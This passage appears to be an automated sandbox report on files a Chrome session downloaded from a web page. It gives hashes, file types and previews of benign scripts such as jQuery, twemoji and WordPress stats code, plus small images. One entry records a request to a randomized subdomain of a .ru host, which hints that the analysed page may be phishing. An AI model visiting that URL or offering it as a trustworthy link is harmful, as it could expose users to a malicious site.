                                                                                                                                                                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                Entropy (8bit):4.610031727380473
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:OF/r9hwinPKDtCkud6iyFKGOMVEnkWCm:ORPKDt5iSTOdEm
                                                                                                                                                                                                                                                MD5:805960210256F831CB412CFD12791DFC
                                                                                                                                                                                                                                                SHA1:D3491E8D66CDEE3C3CF460C51D20C8FD7527A623
                                                                                                                                                                                                                                                SHA-256:7BE5CBF77B764A78CA3232A9F79E4ECE4EC9B452DC953840FAE6FF8B32509368
                                                                                                                                                                                                                                                SHA-512:530BFA16FB43663F6ADB860DAB90FD75CB8C88C2A94B68A2F5626B79B8CBA28093F4FDC1C7242F7568A1D61189801B050C7809174A696B165FFC1B63CB7461A6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSJQlNAyfFVpqfwxIFDTE9lDASBQ14bxIZEgUNoxudyhIFDQ5LEYESEAlQUGpkgCvSWBIFDYOoWz0=?alt=proto
                                                                                                                                                                                                                                                Preview:CiQKBw0xPZQwGgAKBw14bxIZGgAKBw2jG53KGgAKBw0OSxGBGgAKFAoSDYOoWz0aBAgJGAEaBQiaARgC
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 800 x 345, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):58105
                                                                                                                                                                                                                                                Entropy (8bit):7.987962457832366
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:1b074BGsfirBPmrP5KQ6uPnq6jHikXE9Di5mSghjvPd0Ajl:e7lwirYRCbxe5MhjvGs
                                                                                                                                                                                                                                                MD5:3FEC5D7F9B4E4D8A7B1ADB905A03C5CF
                                                                                                                                                                                                                                                SHA1:2917DA86216D5C0CA98C339F2C6C9CF3AD12F4FC
                                                                                                                                                                                                                                                SHA-256:18236194F574FB44D5C8241139B18CC0E91072A5F5F7D6512DB9F185D1F98AD9
                                                                                                                                                                                                                                                SHA-512:63E856BBA78CCFD8E0C08C4038C91DBB7ECFEC2B4C9BF90F4B9CD5D866AA953BB3A16103AFA21C10488B5BED63A5888BC7C12E9B974DC30C28D55861A012F1EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ...Y............IDATx...u|]E.?.g....'M..]....n.a.]l.......Yl../.../m...&m.w..Gf..GJ%M....>.W..k.s.=.s>wf.3D...!..~%6..?. x..&..@.!....!._...@.!.....B.!...!..B...B.!.....B.!...!..B...B.!.....B.!...!..B...B.!.....B.!...!..B...B.!...,..B.!...!..B...B.!...,..B.!...!..B...B.!...,..B.!...!..B...B.!...,..B.!...!..B...B.!...,..B.!.X.!..B...B.!...,..B.!.X.!..B...B.!...,..B.!.X.!..B...B.!...,..B.!.X.!..B...B.!...,...[8.B.....=B.]...?..>R..^_.ml.#&.(IrI.r....,WV....!...!.zG.YK.?.....`ck8.1.(...@p.IZ.. K?|h............Y....B..,....F.w.Z.m.e.D$J.J_.....@.u.....[8..".:...,....a..O...b..,.Kd.@.....UQ........W...."E.q..!.X.!..H...K._....tiT...KE.d........sRt..!.X.!..p.+...VR.U....jc.r..Mi.....q...O...m.V.9........!._K... ..*....u...NI".Dv>]m..3..Y.?6.@.^.E....0#q..n].LR.n.P%<..*..C.?.Q]$nO...._..(.Qz...B.(VU5.WV...t4.;..Se.....u..4.....k:....LU..t.{..f.<..a...o...XY..yU....5....p$f;...,...dz..L:lX...)..]...x....~n.%...'Q..$-Q.J.R..LWn..u....KZ...K.eR.x.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (15752)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):18726
                                                                                                                                                                                                                                                Entropy (8bit):4.756109283632968
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                                                                                                                                                                MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                                                                                                                                                                SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                                                                                                                                                                SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                                                                                                                                                                SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (655), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):655
                                                                                                                                                                                                                                                Entropy (8bit):5.055936985169239
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:2QH2AlXI0Mh3ZoBe1+s+XEKz4tW3DRRTW3u3XDdI+u/obPqRT86f:2QH/wNZoTZXCyRRa3u3X5duQbPqRJf
                                                                                                                                                                                                                                                MD5:5048B7BF6F335C259CAE5D653D50726E
                                                                                                                                                                                                                                                SHA1:96F45044F726EEF7C8E7C7F21F6368BF23A2B3F0
                                                                                                                                                                                                                                                SHA-256:B6E4492D3B8358A81B80908B1F84E6BD2F64A7A46D48793AF99D27BF29F4C2E8
                                                                                                                                                                                                                                                SHA-512:8990F24D3989C392C00A4FC59D78945A401EB3295FC287A2C718323CC83E27B2D403E9E08162B2CEF4F5C944B31D3EEE98560ACBB7BC4DC58B70B72AA83A4311
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:(function(){var e=window.WPGroHo||{};e.my_hash="";e.data={};e.renderers={};e.syncProfileData=function(a,r){if(!e.data[a]){e.data[a]={};var n=document.querySelectorAll("div.grofile-hash-map-"+a+" span");for(var t=0;t<n.length;t++){var o=n[t];e.data[a][o.className]=o.textContent}}e.appendProfileData(e.data[a],a,r)};e.appendProfileData=function(a,r,n){for(var t in a){if(typeof e.renderers[t]==="function"){return e.renderers[t](a[t],r,n,t)}var o=document.getElementById(n);if(o){var d=o.querySelector("h4");if(d){var i=document.createElement("p");i.className="grav-extra "+t;i.innerHTML=a[t];d.insertAdjacentElement("afterend",i)}}}};window.WPGroHo=e})();
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):50
                                                                                                                                                                                                                                                Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (20004), with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):20008
                                                                                                                                                                                                                                                Entropy (8bit):5.325887796778349
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:WT224ffKepaiTx1lkXnQgXRCwR/4RFbUE3aTb68Z2CX:EKaiT9kXnVXMwR/4RP3aTbtV
                                                                                                                                                                                                                                                MD5:B2060380F6B1A57A98E38C887407BF82
                                                                                                                                                                                                                                                SHA1:14C31CCAFF7A1E66484DE81B2643F946954EBE93
                                                                                                                                                                                                                                                SHA-256:B213A1CBB4E3271CA470EB7790AF362AC2E18CE468F8945952C7BD3456D2132E
                                                                                                                                                                                                                                                SHA-512:17A752799B3129302A443EDD261A993F7B658953690CE95F9CA5BA0034D2A0D10E0F851D9507BD95B9F48E656E1AF403C6FB92A1908603633020DD87FD6CA2DB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://0.gravatar.com/js/hovercards/hovercards.min.js?ver=202451b213a1cbb4e3271ca470eb7790af362ac2e18ce468f8945952c7bd3456d2132e
                                                                                                                                                                                                                                                Preview:!function(){"use strict";function t(r){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(r)}function r(r){var a=function(r,a){if("object"!=t(r)||!r)return r;var n=r[Symbol.toPrimitive];if(void 0!==n){var e=n.call(r,a||"default");if("object"!=t(e))return e;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===a?String:Number)(r)}(r,"string");return"symbol"==t(a)?a:a+""}function a(t,a,n){return(a=r(a))in t?Object.defineProperty(t,a,{value:n,enumerable:!0,configurable:!0,writable:!0}):t[a]=n,t}var n={d:(t,r)=>{for(var a in r)n.o(r,a)&&!n.o(t,a)&&Object.defineProperty(t,a,{enumerable:!0,get:r[a]})},o:(t,r)=>Object.prototype.hasOwnProperty.call(t,r)},e={};n.d(e,{S:()=>_});var o,i={top:"paddingBottom",bottom:"paddingTop",left:"paddingRight",right:"paddingLeft"};function c(t,r,a){var n=void 0===a?{}:a
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:V:V
                                                                                                                                                                                                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:0
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://gzxtjeiiyvg3rulexodnny9in4rl6d7aewewrgnjekg7beli8cgba6jfk4g.lpliwptf.ru/occxEbMsaASlqNVkWEqyWydNFGHLKDHUVJNWWLPPADVXYAQO
                                                                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):50
                                                                                                                                                                                                                                                Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://pixel.wp.com/c.gif?u=https%3A%2F%2Fbenisp.com%2Fdan%2Fdann%2Fdannn&r=&b=240074490&p=22&rand=0.1339836907307579
                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 6 x 5
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):50
                                                                                                                                                                                                                                                Entropy (8bit):3.8488255736198
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CN+ltRPQEsJen2sSX:xvQEsJ42sSX
                                                                                                                                                                                                                                                MD5:E4D673A55C5656F19EF81563FB10884C
                                                                                                                                                                                                                                                SHA1:1F2D8ED221D39329251AD3A6FF1EDB20B7219443
                                                                                                                                                                                                                                                SHA-256:F3A8992ACB9AB911E0FA4AE12F4B85EF8E61008619F13EE51C7A121FF87F63B1
                                                                                                                                                                                                                                                SHA-512:E0B03411282A979CF772F700D9E5634B0C25C612E380AD33C0D59059B1B479D027016D5BEB148403EF185430DB35F5FAED362F36CE2C8ECAD0E6D8E30CEA97B4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://pixel.wp.com/g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.5533248508418851
                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,............bx..j....;
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (11996)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11997
                                                                                                                                                                                                                                                Entropy (8bit):5.192362093265119
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:5IUERlE2fU72kNa96nhNemS39A8I9fnjj1m3f3UDcflaa8Es9cZLnseUyVW2Bijc:5IUEB65RjjsHLs9G4eUyVW24jKml9s
                                                                                                                                                                                                                                                MD5:252D475ECFB9AF68FE526FB7D6C83DE8
                                                                                                                                                                                                                                                SHA1:F9DD1B87A1FF9D41E740720BC1D1E64D07FA1958
                                                                                                                                                                                                                                                SHA-256:4A2F20D00C9D3D77E43CCF9047D599ABB8867DA5E6BB4863762F105A5A29EEDE
                                                                                                                                                                                                                                                SHA-512:09958A41BF2435A491F89F9C5FE9AC4B26BFF2E43BCBD0086DABBD0D6D5714AE1FA44212EDA330B25A59FB48D53F4176AD730E2CF54AFF4CFAA9DD85B4887144
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:!function(){"use strict";var n=function(n,t,e,i){var r,o;return function(u){t.value>=0&&(u||i)&&((o=t.value-(null!=r?r:0))||void 0===r)&&(r=t.value,t.delta=o,t.rating=function(n,t){return n>t[1]?"poor":n>t[0]?"needs-improvement":"good"}(t.value,e),n(t))}},t=-1,e=function(n){addEventListener("pageshow",(function(e){e.persisted&&(t=e.timeStamp,n(e))}),!0)},i=function(){var n=performance.getEntriesByType("navigation")[0];if(n&&n.responseStart>0&&n.responseStart<performance.now())return n},r=function(){var n,t=i();return null!==(n=null==t?void 0:t.activationStart)&&void 0!==n?n:0},o=function(n,e){void 0===e&&(e=-1);var o=i(),u="navigate";t>=0?u="back-forward-cache":o&&(document.prerendering||r()>0?u="prerender":document.wasDiscarded?u="restore":o.type&&(u=o.type.replace(/_/g,"-")));return{name:n,value:e,rating:"good",delta:0,entries:[],id:"v5-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:u}},u=function(n){document.prerendering?addEventListener
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2481), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2481
                                                                                                                                                                                                                                                Entropy (8bit):4.94221754472716
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:gkypIQ9tRdE4/gsAs+yp6NQ5c3Ktu8S+9RoTmF+ArM84QpboR6YGHFDeGDHSqz5:zypFjH/gsAZyp6S5gWW+9RoTk+Apbv9l
                                                                                                                                                                                                                                                MD5:146180A330CE9E46E1F9ADEE12415931
                                                                                                                                                                                                                                                SHA1:6424EE3AD0E04217AD924F8232C66780FB206917
                                                                                                                                                                                                                                                SHA-256:4E1DDBB805779444AB8A88A9527FEC667FC9686D1247F88727AD3A04B9EC0573
                                                                                                                                                                                                                                                SHA-512:8CD22742BAB345037FAB961B9BC72BF5AD764DBCFADBE6A9FDDB60B982DEEB07C64B4BCB2259EEDBCE6D39794EBD4EB15DECD05335434967AA2A14BB586F8751
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:(function(){var t;var e;var n;var o=[];var i=[];var r=false;var a="jetpack:wpcomRLT";function c(t){if(!Array.isArray(n)){return false}return n.includes(t)}function s(t,e,n){if(e&&typeof e.postMessage==="function"){try{e.postMessage(JSON.stringify({type:"rltMessage",data:{event:"invalidate",token:t,sourceOrigin:window.location.origin}}),n)}catch(t){return}}}window.rltInvalidateToken=function(n,i){if(n===t){t=null}try{if(window.location===window.parent.location&&window.localStorage){if(window.localStorage.getItem(a)===n){window.localStorage.removeItem(a)}}}catch(t){console.info("localstorage access for invalidate denied - probably blocked third-party access",window.location.href)}for(const[t,e]of o){if(t!==i){s(n,e,t)}}if(e&&e!==i&&window.parent){s(n,window.parent,e)}};window.rltInjectToken=function(t,e,n){if(e&&typeof e.postMessage==="function"){try{e.postMessage(JSON.stringify({type:"loginMessage",data:{event:"login",success:true,type:"rlt",token:t,sourceOrigin:window.location.origin}}
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12788), with no line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):12788
                                                                                                                                                                                                                                                Entropy (8bit):5.253868181785939
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:LXRPSjDWRYtEAU98twdANhSUxiNlTOD2UNFxlGXCpbJX+yCFbAvywybJKbfOas51:SkKn7wd/CFJX+1kbOKrVa
                                                                                                                                                                                                                                                MD5:EF880BE61458E4E89C9CB9D99D2D300E
                                                                                                                                                                                                                                                SHA1:C7740F6524CFAB6084682B1CE320B2E5E9C4D4CC
                                                                                                                                                                                                                                                SHA-256:79674B01741C3978417B6B9B4B98D125755E7BB468979D5CD593EAC4B94CDB91
                                                                                                                                                                                                                                                SHA-512:CAF94D36E2078830AF5D3E78FA9058CA503B5A745BB70ACA7573FCEC6ECF9DA6A5A23C4E7E00D25AE84E5D66E556A2120AAC8558490C4E9D826EFEABA698DB42
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                URL:https://stats.wp.com/w.js?67
                                                                                                                                                                                                                                                Preview:!function(t){var e={};function n(o){if(e[o])return e[o].exports;var r=e[o]={i:o,l:!1,exports:{}};return t[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=t,n.c=e,n.d=function(t,e,o){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:o})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var r in t)n.d(o,r,(function(e){return t[e]}).bind(null,r));return o},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=9)}([function(t,e){function n(e){return"function"==typeof Symbol&&"symbol"==typeof Symbol.i
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 500 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8203
                                                                                                                                                                                                                                                Entropy (8bit):7.925289586105856
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:aYH+PhNuKD4atjkFkCTdTN3KBTXW0MS44EFIcY5fPR:aYepNaGKkCMTm0MZ2cYNR
                                                                                                                                                                                                                                                MD5:5F7B74563BAFAFF6E4CA77BB82D511C5
                                                                                                                                                                                                                                                SHA1:EBCB367071A682D64A2E6471D553AD1FC1F90CD6
                                                                                                                                                                                                                                                SHA-256:C0E93B5EBF107AF77D9E7D101D186B3B93E9D5AD4FBB6A74E2DEA60173CC04F8
                                                                                                                                                                                                                                                SHA-512:D573EF0A2A6E5961021CCED439A55F3EBA9910BA53E6A01364C96549B7CBDF3EF62815B5139ABF5FE76127B8072CF8956C93CE4C6F6FFEA90C9AB2A82E5380CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............../....rPLTE..................................................................................................................r..X...TIDATx.....H... .)Dd..eT....V..U.-$..g?....S(.........................................................."..H....%U......W.y..............n.?..I.I...y.}...v.....Y.7.!...8Y..U......br..lZ#.......'.Y.m.K.<JZ..P1j~..X.^.d.p&).....?..eg.y...U(....s#Og..j.N.~L..Sy.v.....1.A....r..{.I.0r........#..!#..!V.2..3;.A....jd"..m..Xm.F..@.?..>.drR?D.OB..Z....%.....F.+.*,.E..e...O4rcL.Cf....j.&..D^wo.Y...*......n</.N.k.?]....h..B~.Z.C.......13.}x..2.g..C......m...uFM.~.ON...<5......7;.A.D....xor......m'..o.:22V..[M.......E*..\..[..2.'......<L.....qL.G.c.y.......||...i..^...6......g....\....9.J......2....,#....{q........7+.Db+=m^>.NLn.."D..!.[.c..az..1.;.b.....I.\..NfZ.{.C{.^.b%....'.vFl...~.Y...x&..Z.2.Qh....s'...&.u..m....Y...J3Ml..N.B......*.).v........Uj..........2(..V..*HeP...7..2.y.7..O....
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (7485), with CRLF line terminators
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):19895
